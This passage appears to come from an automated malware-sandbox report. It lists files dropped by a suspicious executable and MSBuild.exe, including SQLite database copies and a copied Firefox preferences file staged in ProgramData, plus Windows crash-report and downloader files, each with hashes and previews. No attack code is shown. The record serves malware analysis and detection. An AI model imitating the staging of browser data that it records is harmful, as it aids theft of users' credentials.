Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\IIEHJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\IIIEBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\IIIEBA-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJECAEHJJJK\KJDAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCGDGIDGIJKKEBGDAECA

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJJJKEGH

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJEHJKJEBGHJJKEBGIECAAFIJ

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECBFBAE

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBAECBAEGDGDHIEHIJJ

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263073796187346
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH02:9JZj5MiKNnNhoxuz
MD5:	57F8E9EB436003F203FC6363E28AB700
SHA1:	5A5F195ECDD6B25F8BA4AEA2025658BFFCFCD8D4
SHA-256:	92338B86839DEF46DF3EDCB84FF1EB2C734617592E37775EB8FF7D76FA5CED86
SHA-512:	43271210B39B949AE76899455D1C0B7D6271B802C45734B31F73B4EF24D0AB59D81BC90EAD1238F44BD1EEBC8CAAEBC220EC639A3C7D70C93A19570C2DA3B09A
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xeb35527b, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555816969236168
Encrypted:	false
SSDEEP:	1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
MD5:	8BB0C7FEE7228521CBA3A177449D6054
SHA1:	1B9FB766C051F4DFFF81E132A84251298546779C
SHA-256:	34511D85743617BFC7062F741747891D53EED82657EE3FC51ED6412DD9657914
SHA-512:	E72679AD94631D3EBA5C1F4B9A22A5A0BDF7B769E0922F8F803EA4F702C68A2BC8BB2ADD727E31DF8156C1EBE84972894817757E336C2D6AF369278B3CCCD1A6
Malicious:	false
Preview:	.5R{... .......7.......X\...;...{......................0.e......!...{?......\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................x........\|...................yC......\|#..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07987097101284857
Encrypted:	false
SSDEEP:	3:QMlyYeLDtr3EefNaAPaU1lOOxrlltalluxmO+l/SNxOf:QMlyzLDtjEENDPaUBxegmOH
MD5:	F8FE2C7F25C74F5EAC331292D93AC7E7
SHA1:	DD9FF55504CCA1DE09842D6392BC425BFFBEC34D
SHA-256:	C221EFFCD785B78A844DA1D57612878A960EF14B61876BD726D2903E2DCF3C20
SHA-512:	D3F1A4E9D940E49383DE28B99F5A4D40A3B42E19E703C8BF86BD59066956D3509E9840438C6059948791FF8A31062CD3F3505B7031AA9FC3EB3ED4902218AC77
Malicious:	false
Preview:	..<......................................;...{.......\|#..!...{?..........!...{?..!...{?..g...!...{?..................yC......\|#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4Q6k8SlqG7M24bYO_7f196f7cb54116f579d65b34725960efc7dd48_9fa084fb_8acbbaf3-da9d-4f7c-b82e-25701466c481\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7413614209789998
Encrypted:	false
SSDEEP:	96:ATFFW6RAJRQCs7fhqp7t7qEfRXQXIDcQVc61cEMcw3VH/HB+HbHg/PB6HeaOy1H6:qPaoClm10rx2MjGGzuiFqZ24IO8C1
MD5:	48AB69CBBE7B87A998F0F2479DE05D1B
SHA1:	88079F8DE3FD7007E74F868EA2F4BDE4AAFA0D15
SHA-256:	1189950B1DC980D12CEF3591BD7CA715796F9232FAA89A26F7E796B8630F8877
SHA-512:	8A0F6EA8B0DC4B712C613F70592D857C1B30C1717A8FF55D459A270BE7741CD43C02840E9FDCD92124DDE3036E9A8110A116203E1E583B779CADE2E2E198F1C7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.3.4.5.1.2.0.6.5.5.8.8.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.3.4.5.1.2.2.3.1.6.6.9.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.c.b.b.a.f.3.-.d.a.9.d.-.4.f.7.c.-.b.8.2.e.-.2.5.7.0.1.4.6.6.c.4.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.c.e.8.0.8.8.-.0.8.b.7.-.4.b.3.3.-.b.6.6.4.-.9.4.1.9.d.8.9.5.8.d.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.Q.6.k.8.S.l.q.G.7.M.2.4.b.Y.O.3.U.g.M.W.I.C.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.a.8.-.0.0.0.1.-.0.0.1.5.-.b.c.4.4.-.c.2.c.1.0.2.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.d.b.e.7.d.6.5.6.f.a.8.c.d.1.1.7.5.5.3.c.c.8.b.1.9.5.7.d.7.f.0.0.0.0.f.f.f.f.!.0.0.0.0.8.f.6.9.b.7.9.a.0.d.6.b.c.6.b.4.d.e.f.3.5.b.3.8.e.c.4.6.d.1.5.e.6.e.b.1.c.1.d.9.!.4.Q.6.k.8.S.l.q.G.7.M.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15CE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Jul 1 22:05:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	54624
Entropy (8bit):	1.754658911512505
Encrypted:	false
SSDEEP:	192:UsDYNGpBOySO8a1aKUkqaodYWEtoOyvTj9EA9VptZ:U2TjvadkcYjoOyv39J9/
MD5:	F9E1313BF20F7444CE6F228B73FAED8E
SHA1:	5FA046C68110B8FF3BC270973F28DA6772E29899
SHA-256:	D6DBCBD1859938B4A968089F4BF66D1786F7479D0573AF33E0E2CC8C84ED9730
SHA-512:	7A23F6DC1AE1F7ADA37240D5F31791FBD6FFEC8C824E2551701FB7AB03E11F3B747B847D6BD4B17B62C3C877499D4984377C2B1AF3C23EDDC5317165024165CB
Malicious:	false
Preview:	MDMP..a..... ....... (.f........................0...........$....$..........T.......8...........T...............p...........,...........................................................................................eJ..............GenuineIntel............T............(.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER167A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.7090209948308845
Encrypted:	false
SSDEEP:	192:R6l7wVeJNN6Fm6YXmT1wSUsjgmfQdpDx89bP5sf+SFm:R6lXJn6k6YXJSUIgmfQGPSf+p
MD5:	F91A1783DB7A940B783636245152C4B6
SHA1:	EC575E8AB9F650121DA21FE9A87F498B1BBC1F43
SHA-256:	DDD01332AD1244A1CF6AD4B432A9D50EDE8A47DD81918CC491B8359F384ECCA0
SHA-512:	A2AB4E238E2009B968E6CFCF2A962B6E7CD77A8664370B08743A5E0526BB4423F8EA0DBE8FE2DF894C37A53120521EC158DABDC5D81CBDD34540327E96BAEF13
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.4.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16CA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4677
Entropy (8bit):	4.5568394015048375
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9+JnWpW8VYscYm8M4JxeFM+q8aRRA8wdd:uIjfEI7kY7VJJ1ZRAPdd
MD5:	8553D4829ED71024A8D065E80817ED91
SHA1:	13E10F3FEBFDD1499C0260F895785C1C436E2355
SHA-256:	D0F4743AA30ADCCE5BB02A31BEE96D7326C5C68FC33DC56B0C3BDB54875D3891
SHA-512:	BC6D6D3FE9C1D2D3E8F67CDA083A7C93513C25BCDF0EB2F086479C8397F507CF715C5C39F94B0D5F41561728EE80921407BB7190D69C54D6BD0DAFD2AAAF076A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="392468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16E7.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85790
Entropy (8bit):	3.0525798649872216
Encrypted:	false
SSDEEP:	1536:MpDb8xE2qDLV4FF2QlC/Jt2am5QXSXleyuCemJdN64HhbV:MpDb8xE2qDLV4FF2QlC/Jt2am5QXSXl7
MD5:	D051C11D6BB8C3EC00E052AB8041BB7A
SHA1:	44CFD6863F2306B88F3AF0881591BFD737B3BBB0
SHA-256:	0775412A10E94D699855B26B79C2FB3138EB5688A57769FB8A6AE7B83E1BDCB0
SHA-512:	A0E523A2AC3692BC5C120C11C0CF32A4BCC0BB63FE752AC41282DCFDE5B3E4A22C4DB809142CCDAA8DE99EE14F6E69A7A83E2D82E1A7E479CF27E7C050BD5F86
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1755.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.684939244826221
Encrypted:	false
SSDEEP:	96:TiZYWl3Ogu3JYuYjW/HBYEZkHDatFiWM5AgwD8/a0FDYMeu+I5h3:2ZDq5ZaHDGua0FEMeuJ5h3
MD5:	694D94EAF40F61DE975F45DE6368ADFC
SHA1:	A0FE36B2687AC60A8F5C7E71FF57352A623E22FC
SHA-256:	8E0D133FFF847D4EEE3A74DB62F5CE3E86B32FE2CAFCF585475C2A90C9239344
SHA-512:	9D37816AFB0BC50ED140151064B5457F0D0C46AA503358A4A521A1C2E2BD1222C2A371CDA3F9BA3FD96B6675E397E6AFB19D83E614D08C00EA9838960BB32C28
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FC3.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	94446
Entropy (8bit):	3.036497755032533
Encrypted:	false
SSDEEP:	1536:bLDHdQrYKY74VZr06Aw8Hws/iXL+nP+VshGLKVGNDVQS3G+XeOjj+dazo9Pl9q:bLDHdQrYKY74VZr06Aw8Hws/iXL+nP+5
MD5:	082800A644E5266FE9E0FF28D1B19CBD
SHA1:	4D04CF1F2B3E7755204A15BDF9B0DF06E45A9406
SHA-256:	BD6B17F1423E82534F95CE28557134DC8F60FE100552A92DBCDA5E67418A03C3
SHA-512:	3FF9563CB10C6AE8BB449449D69D7877217165675ED3F5A20BDB6657F5DDAECAEDD8CC6873635B9391610A9F31A3D5B16C17284C8695120FD2C8F76EF629614B
Malicious:	false
